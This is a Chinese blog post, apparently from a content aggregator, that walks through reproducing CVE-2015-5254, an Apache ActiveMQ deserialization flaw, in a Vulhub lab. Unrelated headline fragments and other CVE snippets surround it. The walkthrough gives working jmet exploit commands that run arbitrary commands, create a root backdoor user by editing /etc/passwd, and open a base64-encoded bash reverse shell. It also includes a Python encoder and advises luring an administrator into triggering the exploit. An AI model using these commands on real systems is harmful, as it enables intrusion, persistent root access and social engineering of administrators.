- Java锁的逻辑(结合对象头和ObjectMonitor)
- 还在用饼状图?来瞧瞧这些炫酷的百分比可视化新图形(附代码实现)⛵
- 自动注册实体类到EntityFrameworkCore上下文,并适配ABP及ABPVNext
- 基于Sklearn机器学习代码实战
1.漏洞介绍.
Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的 Java 消息服务(JMS)ObjectMessage 对象利用该漏洞执行任意代码.
2.环境介绍.
复现环境采用kali搭建Vulhub.
靶机: 172.18 . 0.1 : 8161
环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问 http://your-ip:8161 即可看到web管理页面,不过这个漏洞理论上是不需要web的.
3.漏洞利用.
3.1漏洞利用过程简述.
3.2具体过程.
(1)访问web界面并进行登录.
账号:admin
密码:admin
(2)使用 j met进行漏洞利用.
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误).
wget https: // github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar // 下载jar文件 mkdir external // 创建external文件夹
执行命令:
java -jar jmet- 0.1 . 0 -all.jar -Q event -I ActiveMQ -s -Y " touch /tmp/success " -Yp ROME 172.18 . 0.1 61616
//创建 /tmp/success,同理可进行其他命令的操作
我们返回管理界面,发现添加了一个名为事件的队列.
点击进入 。
此时已经触发命令执行,我们进入dockor查看 。
docker
ps
docker exec -it b189872443f5 /bin/bash
可以发现tmp目录已创建,进入发现sucess,漏洞利用成功 。
创建一个用户 。
java -jar jmet- 0.1 . 0 -all.jar -Q event -I ActiveMQ -s -Y " useradd -g root -s /bin/bash -u 10010 Tom " -Yp ROME 172.18.0.1 61616
触发条件和之前相同,在管理界面去点击队列 。
java -jar jmet- 0.1 . 0 -all.jar -Q event -I ActiveMQ -s -Y " sed -i " s/test:x: 10010 /Tom:x: 0 /g " /etc/passwd " -Yp ROME 172.18.0.1 61616 //修改权限 java -jar jmet- 0.1 . 0 -all.jar -Q event -I ActiveMQ -s -Y " echo " Tom:sd123456 " | chpasswd " -Yp ROME 172.18.0.1 61616
//添加密码
至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接 。
或者将命令换为反弹shell再利用:
bash -i >& /dev/tcp/ 172.18 . 0.1 / 777 0 >& 1
使用base64编码payload绕过Java机制 。
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx
附上base64编码脚本 。
import base64 # Sample string to encode string = " bash -i >& /dev/tcp/172.18.0.1/777 0>&1 " # Encoding the string encoded_string = base64.b64encode(string.encode( ' utf-8 ' )) # Printing the encoded string print (encoded_string.decode( ' utf-8 ' ))
构建pyload 。
java -jar jmet- 0.1 . 0 -all.jar -Q event -I ActiveMQ -s -Y " bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx }|{base64,-d}|{bash,-i} " -Yp ROME 172.18.0.1 61616
使用nc监听端口 。
反弹shell成功 。
值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发.
。
最后此篇关于CVE-2015-5254漏洞复现的文章就讲到这里了,如果你想了解更多关于CVE-2015-5254漏洞复现的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)
https://nvd.nist.gov/vuln/detail/CVE-2018-2783表示“适用于 Java 的客户端和服务器部署。可以通过沙盒 Java Web Start 应用程序和沙盒 J
如题所示 我找不到关于这个漏洞的详细解释 不胜感激 查看链接了解更多信息 https://cordova.apache.org/announcements/2016/04/27/security.ht
鉴于最近发现的允许在 7.0.0 到 7.0.79 版本中远程执行代码的 Tomcat 漏洞(CVE-2017-12615 和 CVE-2017-12616),对 WSO2 IS 用户有什么建议? W
Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938) 复现环境 采用Vulfocus靶场环境进行复现,搭建操作和文章
关于https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/中的“spring4shell”漏洞。有谁知道这个漏洞是否影响 JFrog
关于https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/中的“spring4shell”漏洞。有谁知道这个漏洞是否影响 JFrog
我想解决我项目中的每个 CVE 问题。我正在使用 org.owasp.dependencycheck 插件,但即使在一个空项目上它也返回几个 CVE: bcprov-jdk15on-1.56.jar:
1.漏洞介绍。 Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。
1.背景介绍。 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和
前言 Active Directory 域服务,是一种目录服务,提供了存储目录数据信息以及用户相关的一些密码,电话号码等等一些数据信息,且可让用户和管理员使用这些数据,有利于域管理员对用户
log4j2 JNDI注入漏洞(CVE-2021-44228) 概述 本文非常详细的从头到尾debug了CVE-2021-44228漏洞的利用过程,喜欢的师傅记得点个推荐~ Apache Log
本文分享自华为云社区《CVE-2021-3129 分析》,作者:Xuuuu 。 CVE-2021-3129 Tag: php phar | php deserialize Env搭建 VulEnv/l
我对正则表达式的概念很陌生,所以我希望专家用户可以帮助我制作正确的表达式来查找字符串中的所有匹配项。我有一个字符串,其中包含许多漏洞数据的支持信息。在该字符串中是一系列格式为 CVE-2015-400
我正在 Azure Graph Explorer 中运行以下 KQL 查询 securityresources | where type == "microsoft.security/assessme
CVE 补丁 描述指出: Linux内核到4.6.3为止的security/keys/key.c中的key_reject_and_link函数并不能确保某个数据结构被初始化,这使得本地用户通过涉及精心
我想对一些服务器进行测试,看看它们是否容易受到 CVE 数据库 (cve.mitre.org) 中的一系列漏洞的攻击。我可以访问服务器,所以我可以知道所有已安装软件包的版本号。我是使用 CVE 数据库
前言 SQL注入的原理是对web请求,表单或域名等提交查询的字符串没有进行安全检测过滤,攻击者可以拼接执行恶意SQL命令,导致用户数据泄露 。 漏洞原理 Django 组件存在
目录 Log4j2漏洞原理 漏洞根因 调用链源码分析 调用链总结 漏洞复现 dn
本文分享自华为云社区《CVE-2022-22965 漏洞分析》,作者:Xuuuu。 CVE-2022-22965 A Spring MVC or Spring WebFlux application
我是一名优秀的程序员,十分优秀!